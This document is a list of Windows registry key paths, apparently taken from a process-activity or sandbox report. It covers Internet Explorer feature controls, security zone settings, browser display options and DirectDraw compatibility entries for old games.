  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
  • HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/html;charset=utf-8
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/html\Extension
  • HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\text/html;charset=utf-8
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/html;charset=utf-8
  • HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\text/html
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/html
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FEEDS
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\*
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollInset
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollDelay
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollInterval
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Security\Floppy Access
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\Adv AddrBar Spoof Detection
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Security\Adv AddrBar Spoof Detection
  • HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\about\
  • HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Handler\about
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\about
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\about\CLSID
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2106
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Zoom
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Zoom
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Zoom
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Zoom\ZoomDisabled
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Zoom
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History\DaysToKeep
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IPERSISTMONIKER_LOAD_REDIRECTED_URL_KB976425
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IPERSISTMONIKER_LOAD_REDIRECTED_URL_KB976425
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\SmartDithering
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SmartDithering
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseClearType
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Page_Transitions
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Display Inline Videos
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use Stylesheets
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Force Offscreen Composition
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseThemes
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\XDomainRequest
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\International\Scripts
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\International\Scripts
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Settings
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Settings
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\Use My Stylesheet
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\x8f\x91\xe9\x80\x81\xe8\x87\xb3 OneNote(&N)
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\x8f\x91\xe9\x80\x81\xe8\x87\xb3 OneNote(&N)\(Default)
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\x8f\x91\xe9\x80\x81\xe8\x87\xb3 OneNote(&N)\Flags
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\x8f\x91\xe9\x80\x81\xe8\x87\xb3 OneNote(&N)\Contexts
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\xaf\xbc\xe5\x87\xba\xe5\x88\xb0 Microsoft Excel(&X)
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\xaf\xbc\xe5\x87\xba\xe5\x88\xb0 Microsoft Excel(&X)\(Default)
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\xaf\xbc\xe5\x87\xba\xe5\x88\xb0 Microsoft Excel(&X)\Flags
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\xaf\xbc\xe5\x87\xba\xe5\x88\xb0 Microsoft Excel(&X)\Contexts
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Version Vector
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Version Vector\VML
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Version Vector\IE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Version Vector\WindowsEdition
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2700
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*
  • HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Zones
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\*
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\DxTrans
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DxTrans
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\DxTrans
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CoInternetCombineIUriCacheSize
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CoInternetCombineIUriCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CoInternetCombineIUriCacheSize
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CoInternetCombineIUriCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1604
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecurityIdIUriCacheSize
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecurityIdIUriCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecurityIdIUriCacheSize
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SecurityIdIUriCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SSLUX
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SSLUX
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SSLUX\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SSLUX\*
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SECURITYBAND
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SECURITYBAND
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SECURITYBAND\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SECURITYBAND\*
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Restrictions\NoNavButtons
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IEDDE_REGISTER_URLECHO
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IEDDE_REGISTER_URLECHO
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1201
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESPECT_OBJECTSAFETY_POLICY_KB905547
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESPECT_OBJECTSAFETY_POLICY_KB905547
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\svchost.exe
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Recovery
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\AutoRecover
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCRIPTURL_MITIGATION
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_IMG
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_IMG
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_IMG\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_IMG\*
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2000
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Default Behaviors
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default Behaviors\DXTFilterBehavior
  • HKEY_LOCAL_MACHINE\Software\Microsoft\DirectDraw\Compatibility
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Bug!
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Bug!\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Bug!\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Bug!\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\DemolitionDerby2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\DemolitionDerby2\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\DemolitionDerby2\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\DemolitionDerby2\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Diablo
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Diablo\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Diablo\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Diablo\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MortalKombat3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MortalKombat3\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MortalKombat3\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MortalKombat3\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MsGolf98
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MsGolf98\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MsGolf98\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MsGolf98\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NHLPowerPlay
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NHLPowerPlay\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NHLPowerPlay\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NHLPowerPlay\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NortonSystemInfo
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NortonSystemInfo\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NortonSystemInfo\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NortonSystemInfo\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Rogue Squadron
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Rogue Squadron\Name
